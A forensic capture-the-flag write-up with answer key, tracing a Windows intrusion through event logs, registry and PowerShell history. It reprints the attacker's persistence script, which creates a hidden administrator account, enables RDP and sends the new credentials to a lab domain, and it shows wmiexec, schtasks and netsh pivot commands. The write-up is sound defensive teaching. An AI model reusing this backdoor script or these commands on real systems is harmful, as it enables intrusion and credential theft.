Description:

LeStrade passes disk image artifacts to Watson. It's one of the identified breach points, now showing abnormal CPU activity and anomalies in process logs.

Scenario Files

The_Enduring_Echo.zip - KAPE output - SHA256: 6efc1b8f809016100f58beef650c83557966235d7b327f890713f296710436e0

We use EvtxECmd.exe to parse every .evtx (Windows event log) file under winevt\logs into a single CSV, so that all channels can be searched and sorted together:

.\EvtxECmd.exe -d "D:\Users\p4n4\Downloads\The_Enduring_Echo\The_Enduring_Echo\C\Windows\System32\winevt\logs" --csv "D:\Users\p4n4\Downloads\The_Enduring_Echo\The_Enduring_Echo" --csvf evtx.csv

Flags

1. What was the first (non cd) command executed by the attacker on the host? (string)

Show solution
systeminfo
Filtering evtx.csv on Event ID 4688 (Process Creation) shows the attacker's commands, each carrying a redirect of the form 1> \\127.0.0.1\ADMIN$\__1756075857.955773 2>&1, i.e. stdout and stderr written to a file on the host's own ADMIN$ share so a remote tool can collect the output over SMB. Skipping the initial cd commands, the first command executed is systeminfo.

2. Which parent process (full path) spawned the attacker’s commands? (C:\FOLDER\PATH\FILE.ext)

Show solution
C:\Windows\System32\wbem\WmiPrvSE.exe
The PayloadData1 column of the same 4688 event holds the creator (parent) process, which is WmiPrvSE.exe, the WMI provider host.

3. Which remote-execution tool was most likely used for the attack? (filename.ext)

Show solution
wmiexec.py
Both artifacts are the fingerprint of Impacket's wmiexec.py: it runs commands through WMI (Win32_Process.Create, so cmd.exe is spawned by WmiPrvSE.exe) and wraps each one as cmd.exe /Q /c <command> 1> \\127.0.0.1\ADMIN$\__<timestamp> 2>&1, then reads the output file back over SMB. The number in the file name is the Unix epoch time on the attacker's machine when the command was sent; 1756075857 decodes to 2025-08-24 22:50:57 UTC.
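As an added example (not part of the writeup), the triage behind Q1 to Q3 can be scripted over EvtxECmd output. The rows below are constructed to resemble evtx.csv and use EvtxECmd's column names but only four of its columns; that PayloadData1 holds the creator process path, optionally behind a "Label: " prefix, is an assumption based on what the writeup describes.

```python
import csv
import io
import re
from datetime import datetime, timezone

# Constructed rows in EvtxECmd's CSV layout (four of its columns). The command
# lines are modelled on the case but are not copied from the real evtx.csv.
# PayloadData1 is assumed to hold the parent (creator) process path.
SAMPLE_CSV = r"""TimeCreated,EventId,PayloadData1,ExecutableInfo
2025-08-24 22:49:58.1012345,4688,C:\Windows\System32\services.exe,C:\Windows\System32\svchost.exe -k netsvcs
2025-08-24 22:50:20.5056789,4624,-,-
2025-08-24 22:50:31.2023456,4688,C:\Windows\System32\wbem\WmiPrvSE.exe,cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1756075831.118204 2>&1
2025-08-24 22:50:57.3034567,4688,C:\Windows\System32\wbem\WmiPrvSE.exe,cmd.exe /Q /c systeminfo 1> \\127.0.0.1\ADMIN$\__1756075857.955773 2>&1
"""

# wmiexec.py wraps every command as:
#   cmd.exe /Q /c <command> 1> \\127.0.0.1\ADMIN$\__<time.time()> 2>&1
WMIEXEC_RE = re.compile(
    r"^cmd\.exe /Q /c (?P<cmd>.*?) 1> \\\\127\.0\.0\.1\\ADMIN\$\\__(?P<epoch>\d+)\.\d+ 2>&1$"
)


def wmiexec_commands(csv_text):
    """Return the 4688 events that carry the wmiexec redirect, oldest first."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["EventId"] != "4688":
            continue
        m = WMIEXEC_RE.match(row["ExecutableInfo"])
        if not m:
            continue
        # the epoch in the output file name is the attacker-side clock
        # at the moment the command was sent
        issued = datetime.fromtimestamp(int(m.group("epoch")), tz=timezone.utc)
        hits.append({
            "time_created": row["TimeCreated"],
            # drop an optional "Label: " prefix so either column layout works
            "parent": row["PayloadData1"].split(": ", 1)[-1],
            "command": m.group("cmd"),
            "issued_utc": issued.strftime("%Y-%m-%d %H:%M:%S"),
        })
    hits.sort(key=lambda h: h["time_created"])
    return hits


def first_non_cd_command(hits):
    """Skip the cd commands that precede the real activity (Q1 excludes them)."""
    for h in hits:
        cmd = h["command"].strip()
        if cmd == "cd" or cmd.startswith("cd "):
            continue
        return h
    return None


if __name__ == "__main__":
    hits = wmiexec_commands(SAMPLE_CSV)
    for h in hits:
        print(h["time_created"], h["parent"], repr(h["command"]), "sent", h["issued_utc"])
    first = first_non_cd_command(hits)
    print("first non-cd command:", first["command"], "parent:", first["parent"])
```

The same regex works as a hunting rule on the full evtx.csv: any 4688 command line matching it is a wmiexec session, and the parent column should always read WmiPrvSE.exe for those rows.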

4. What was the attacker’s IP address? (IPv4 address)

Show solution
10.129.242.110
Searching the remaining cmd.exe commands the attacker ran, we find one that modifies the hosts file (C:\Windows\System32\drivers\etc\hosts). The IP address in the entry the attacker adds is the attacker's own.

5. What is the first element in the attacker’s sequence of persistence mechanisms? (string)

Show solution
SysHelper update
Continuing through the attacker's 4688 events, we see a scheduled task being created with schtasks; the task name given with /tn is SysHelper update.

6. Identify the script executed by the persistence mechanism. (C:\FOLDER\PATH\FILE.ext)

Show solution
C:\Users\Werni\Appdata\Local\JM.ps1
The task's action (/tr) in that schtasks command gives the script path, and the file itself is present in the KAPE output:

# List of potential usernames
$usernames = @("svc_netupd", "svc_dns", "sys_helper", "WinTelemetry", "UpdaterSvc")

# Check for existing user
$existing = $usernames | Where-Object {
    Get-LocalUser -Name $_ -ErrorAction SilentlyContinue
}

# If none exist, create a new one
if (-not $existing) {
    $newUser = Get-Random -InputObject $usernames
    $timestamp = (Get-Date).ToString("yyyyMMddHHmmss")
    $password = "Watson_$timestamp"

    $securePass = ConvertTo-SecureString $password -AsPlainText -Force

    New-LocalUser -Name $newUser -Password $securePass -FullName "Windows Update Helper" -Description "System-managed service account"
    Add-LocalGroupMember -Group "Administrators" -Member $newUser
    Add-LocalGroupMember -Group "Remote Desktop Users" -Member $newUser

    # Enable RDP
    Set-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Terminal Server" -Name "fDenyTSConnections" -Value 0
    Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
    Invoke-WebRequest -Uri "http://NapoleonsBlackPearl.htb/Exchange?data=$([Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes("$newUser|$password")))" -UseBasicParsing -ErrorAction SilentlyContinue | Out-Null
}

7. What local account did the attacker create? (string)

Show solution
svc_netupd
The script picks the name with Get-Random from five candidates, so it cannot be determined from the script alone. The authoritative source is Event ID 4720 (A user account was created), which names the new account: svc_netupd.

8. What domain name did the attacker use for credential exfiltration? (domain)

Show solution
NapoleonsBlackPearl.htb
The Invoke-WebRequest in the script sends the new username and password, base64-encoded, to http://NapoleonsBlackPearl.htb/Exchange?data=..., so the exfiltration domain is NapoleonsBlackPearl.htb.

9. What password did the attacker’s script generate for the newly created user? (string)

Show solution
Watson_20250824160509
The password is built from the local time at which the script ran:

$timestamp = (Get-Date).ToString("yyyyMMddHHmmss")
$password = "Watson_$timestamp"

Event ID 4720 gives the creation time, but EvtxECmd writes TimeCreated in UTC, whereas Get-Date returns the host's local time, so the timestamp has to be converted to the victim's time zone. The zone is stored in the SYSTEM hive under ControlSet001\Control\TimeZoneInformation (the HKLM\TempHive path above is the offline SYSTEM hive from the KAPE output loaded with reg load); TimeZoneKeyName is Pacific Standard Time. Because the event is in August, daylight time is in effect (PDT, UTC-7), which gives 16:05:09 local and therefore Watson_20250824160509. Applying the standard offset (UTC-8) would be off by an hour.
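As an added example (not part of the writeup), the conversion from the 4720 TimeCreated to the victim's local time and the resulting password string, with the PST/PDT rule applied explicitly rather than trusting the local machine's zone database. The TimeCreated value is constructed to be consistent with the writeup's answer and is not copied from evtx.csv.

```python
from datetime import datetime, timedelta, timezone

# Constructed: TimeCreated of the 4720 event as EvtxECmd writes it (UTC, seven
# fractional digits). Chosen to match the writeup's answer, not taken from the
# real evtx.csv.
EVENT_4720_TIMECREATED = "2025-08-24 23:05:09.4021337"


def nth_sunday(year, month, n):
    """Naive datetime (midnight) of the n-th Sunday of a month."""
    first = datetime(year, month, 1)
    # weekday(): Monday == 0 ... Sunday == 6
    first_sunday = first + timedelta(days=(6 - first.weekday()) % 7)
    return first_sunday + timedelta(days=7 * (n - 1))


def pacific_offset(utc_dt):
    """UTC offset of the Windows zone 'Pacific Standard Time' at a UTC instant.
    Post-2007 US rule: DST runs from 02:00 local on the second Sunday of March
    (10:00 UTC, clocks still on PST) to 02:00 local on the first Sunday of
    November (09:00 UTC, clocks on PDT)."""
    y = utc_dt.year
    dst_start = nth_sunday(y, 3, 2).replace(hour=10, tzinfo=timezone.utc)
    dst_end = nth_sunday(y, 11, 1).replace(hour=9, tzinfo=timezone.utc)
    return timedelta(hours=-7) if dst_start <= utc_dt < dst_end else timedelta(hours=-8)


def parse_timecreated(timecreated):
    """EvtxECmd's 'YYYY-MM-DD HH:MM:SS.fffffff' (UTC) -> aware datetime."""
    naive = datetime.strptime(timecreated[:19], "%Y-%m-%d %H:%M:%S")
    return naive.replace(tzinfo=timezone.utc)


def to_victim_local(timecreated):
    utc_dt = parse_timecreated(timecreated)
    return utc_dt.astimezone(timezone(pacific_offset(utc_dt)))


def expected_password(timecreated):
    """Mirror of the script: 'Watson_' + (Get-Date).ToString('yyyyMMddHHmmss')."""
    return "Watson_" + to_victim_local(timecreated).strftime("%Y%m%d%H%M%S")


def password_candidates(timecreated, window_seconds=3):
    """Get-Date runs before New-LocalUser, so the 4720 event can be logged a
    second or two after the password was built; list every candidate in that
    window so all of them can be tried against the flag or a credential dump."""
    local = to_victim_local(timecreated)
    return ["Watson_" + (local - timedelta(seconds=s)).strftime("%Y%m%d%H%M%S")
            for s in range(window_seconds + 1)]


if __name__ == "__main__":
    print(to_victim_local(EVENT_4720_TIMECREATED).isoformat())
    print(expected_password(EVENT_4720_TIMECREATED))
    print(password_candidates(EVENT_4720_TIMECREATED))
```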

10. What was the IP address of the internal system the attacker pivoted to? (IPv4 address)

Show solution
192.168.1.101
Continuing through the attacker's 4688 events, we find a netsh interface portproxy add v4tov4 command that forwards a port on the victim to 192.168.1.101 (the connectaddress), the internal host the attacker pivoted to.

11. Which TCP port on the victim was forwarded to enable the pivot? (port 0-65535)

Show solution
9999
The listenport value of that netsh command.

12. What is the full registry path that stores persistent IPv4→IPv4 TCP listener-to-target mappings? (HKLM......)

Show solution
HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp
netsh persists portproxy rules in the registry under this key: each value is named listenaddress/listenport and its REG_SZ data is connectaddress/connectport, so the forward survives reboots until it is explicitly deleted. In the offline SYSTEM hive from the KAPE output the key is found under ControlSet001 rather than CurrentControlSet, because CurrentControlSet is a link that only exists on the live system.
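As an added example (not part of the writeup) covering Q10 to Q12, a small parser that pulls the listener and target out of the netsh command line seen in 4688 and cross-checks it against the values stored under the PortProxy key. The inputs are constructed: listenport 9999 and target 192.168.1.101 follow the writeup, while connectport=3389 and listenaddress=0.0.0.0 are assumptions made for the example.

```python
import re

# Constructed sample: the netsh line as it would appear in the 4688 command
# line. listenport and connectaddress follow the writeup; connectport=3389
# and listenaddress=0.0.0.0 are assumed for the example.
SAMPLE_4688_CMDLINE = ("netsh interface portproxy add v4tov4 listenport=9999 "
                       "listenaddress=0.0.0.0 connectport=3389 connectaddress=192.168.1.101")

# Constructed: the same rule as netsh persists it under
# HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp,
# value name "listenaddress/listenport" -> REG_SZ "connectaddress/connectport".
SAMPLE_PORTPROXY_VALUES = {"0.0.0.0/9999": "192.168.1.101/3389"}

NETSH_RE = re.compile(
    r"netsh\s+(?:interface|int)\s+portproxy\s+add\s+v4tov4\s+(?P<args>.+)", re.I
)
KEYS = ("listenaddress", "listenport", "connectaddress", "connectport")


def parse_netsh_portproxy(cmdline):
    """Extract the listener/target fields from a 'netsh ... portproxy add v4tov4' line."""
    m = NETSH_RE.search(cmdline)
    if not m:
        return None
    rule = {}
    for token in m.group("args").split():
        if "=" in token:
            k, v = token.split("=", 1)
            rule[k.lower()] = v
    # fields netsh was not given stay None; they are not defaulted here
    return {k: rule.get(k) for k in KEYS}


def registry_form(rule):
    """The (value name, data) pair netsh writes for this rule."""
    return (f"{rule['listenaddress']}/{rule['listenport']}",
            f"{rule['connectaddress']}/{rule['connectport']}")


def rules_from_registry(values):
    """Invert the registry layout back into rule dicts (useful on an offline hive)."""
    out = []
    for name, data in values.items():
        la, lp = name.split("/", 1)
        ca, cp = data.split("/", 1)
        out.append({"listenaddress": la, "listenport": lp,
                    "connectaddress": ca, "connectport": cp})
    return out


def pivot_summary(cmdline, registry_values):
    """Answer Q10/Q11 from the command line and confirm the rule still persists."""
    rule = parse_netsh_portproxy(cmdline)
    if rule is None:
        return None
    name, data = registry_form(rule)
    return {
        "forwarded_port": int(rule["listenport"]),
        "pivot_target": rule["connectaddress"],
        "persisted": registry_values.get(name) == data,
    }


if __name__ == "__main__":
    print(pivot_summary(SAMPLE_4688_CMDLINE, SAMPLE_PORTPROXY_VALUES))
    print(rules_from_registry(SAMPLE_PORTPROXY_VALUES))
```

On a live host the same comparison can be made against netsh interface portproxy show all; on the KAPE image the values have to be read from the SYSTEM hive (ControlSet001\Services\PortProxy\v4tov4\tcp).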

13. What is the MITRE ATT&CK ID associated with the previous technique used by the attacker to pivot to the internal system? (Txxxx.xxx)

Show solution
T1090.001
T1090.001 is Proxy: Internal Proxy in MITRE ATT&CK: using a compromised host to relay traffic to other systems inside the network, which is exactly what the netsh portproxy rule does here.

14. Before the attack, the administrator configured Windows to capture command line details in the event logs. What command did they run to achieve this? (command)

Show solution
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Audit" /v ProcessCreationIncludeCmdLine_Enabled /t REG_DWORD /d 1 /f
The Administrator's PowerShell history at \Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt in the KAPE output records this command. Setting ProcessCreationIncludeCmdLine_Enabled to 1 is what makes 4688 events include the process command line; without it the earlier questions could not have been answered from the event log.